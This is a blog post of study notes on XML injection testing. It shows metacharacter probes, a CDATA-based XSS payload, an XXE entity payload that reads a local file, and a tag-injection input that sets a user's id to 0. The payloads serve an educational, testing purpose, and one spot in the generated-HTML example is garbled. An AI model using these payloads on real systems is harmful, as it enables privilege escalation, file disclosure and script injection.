i XML Injection – All things in moderation

XML Injection

  • Summary
    1. XML Injection testing is when a tester tries to inject an XML doc to the application. If the XML parser fails to contextually validate data, then the test will yield a positive result.
    2. xml injection steps: try insert xml meteacharacters to know xml working and structure then try to inject xml data and tags
  • How to test
    • Dicovery :  When no sanitized, this character could throw an exception during XML parsing
      • Single code: ‘
        <node attrib='foo''/>
      • Double quote: ”
        <node attrib="foo""/>
      • Angular parentsheses: > and <
        Username = foo<

        the application will build a new node

        <user>
             <username>foo<</username>
             <password>Un6R34kb!e</password>
             <userid>500</userid>
             <mail>[email protected]</mail>
        </user>
      • Comment tag: <!–/–>
        Username = foo<!--

        the application will build a node like the following

        <user>
            <username>foo<!--</username>
            <password>Un6R34kb!e</password>
            <userid>500</userid>
            <mail>[email protected]</mail>
        </user>
      • Ampersand: & – Its used in the XML syntax to represent entities.
        For example:

        <tagnode>&lt;</tagnode>

        is valid, and represent ‘<‘ ASCII character.
        If ‘&’ not encoded ifself with &amp;,  it could be used to test XML injection
        For example:

        Username = &foo

        a new node will be created:

        <user>
        <username>&foo</username>
        <password>Un6R34kb!e</password>
        <userid>500</userid>
        <mail>[email protected]</mail>
        </user>
      • CDATA section delimiters: <!CDATA[/]]>
        • CDATA defined a blocks of text there are not parsed by parser but are otherwise recongnized as markup
          For example, if there is the need to represent the string ‘<foo>’ inside the text node, a CDATA section may be used:

          <node>
              <![CDATA[<foo>]]>
          </node>
        • CDATA Rules:
          • CDATA cannot contain the string “]]>” anywhere in the XML document. The tester could try inject the end CDATA string ‘]]>’  to invalidate XML document
            <username><![CDATA[]]>]]></username>
        • Suppose that the XML  is processed to HTML page. In this case, the CDATA section delimiters may be simply eliminated.
           <html>
           $HTMLCode
           </html>

          Attacker can provide the following input:

          $HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')
          <![CDATA[<]]>/script<![CDATA[>]]>

          Generating HTML :

          osourc /Nguan

          alert('XSS')
    • Inject

      • External entity injection (XXE)

        •  Define  (xml read file )
          <?xml version="1.0" encoding="ISO-8859-1"?>
           <!DOCTYPE foo [
            <!ELEMENT foo ANY >
            <!ENTITY xxe SYSTEM "file:///dev/random" >]> <foo>&xxe;
          </foo>
          
          • Unless configured to do otherwise, external entities force the XML parser to access the resource specified by the URI . Confi:

             bool libxml_disable_entity_loader ([ bool $disable = true ] )

          • This behavior exposes the application to XML eXternal Entity (XXE) attacks, which can be used to perform denial of service of the local system, gain unauthorized access to files on the local machine.
          • Labs: bWAPP bWAPP      (xml injection )
        • Tag injection:

          the tester will have some information about the structure of the XML document. Then, it is possible to try to inject XML data and tag
          – Example :

          Username: tony
          Password: Un6R34kb!e
          E-mail: [email protected]</mail><userid>0</userid><mail>[email protected]
          

          The application will build a new node and append it to the XML database:
          Let’s suppose that the XML document is specified by the following DTD:

          <?xml version="1.0" encoding="ISO-8859-1"?>
          <users>
          	<user>
          		<username>gandalf</username>
          		<password>!c3</password>
          		<userid>0</userid>
          		<mail>[email protected]</mail>
          	</user>
          	<user>
          		<username>Stefan0</username>
          		<password>w1s3c</password>
          		<userid>500</userid>
          		<mail>[email protected]</mail>
          	</user>
          	<user>
          		<username>tony</username>
          		<password>Un6R34kb!e</password>
          		<userid>500</userid>
          		<mail>[email protected]</mail><userid>0</userid><mail>[email protected]</mail>
          	</user>
          </users>
          Note that the userid node is defined with cardinality 1
          • DTA (data type defition)
            <!DOCTYPE users [
            	  <!ELEMENT users (user+) >
            	  <!ELEMENT user (username,password,userid,mail+) >
            	  <!ELEMENT username (#PCDATA) >
            	  <!ELEMENT password (#PCDATA) >
            	  <!ELEMENT userid (#PCDATA) >
            	  <!ELEMENT mail (#PCDATA) >
            ]>
            Username: tony
            Password: Un6R34kb!e</password><!--
            E-mail: --><userid>0</userid><mail>[email protected]
            
            
            Inject:
            Username: tony
            Password: Un6R34kb!e</password><!--
            E-mail: --><userid>0</userid><mail>[email protected]
            
            <?xml version="1.0" encoding="ISO-8859-1"?>
            <users>
            	<user>
            		<username>gandalf</username>
            		<password>!c3</password>
            		<userid>0</userid>
            		<mail>[email protected]</mail>
            	</user>
            	<user>
            		<username>Stefan0</username>
            		<password>w1s3c</password>
            		<userid>500</userid>
            		<mail>[email protected]</mail>
            	</user>
            	<user>
            		<username>tony</username>
            		<password>Un6R34kb!e</password><!--
            </password>
            		<userid>500</userid>
            		<mail>--><userid>0</userid><mail>
            [email protected]</mail>
            	</user>
            </users>
            
            
            

Leave a Reply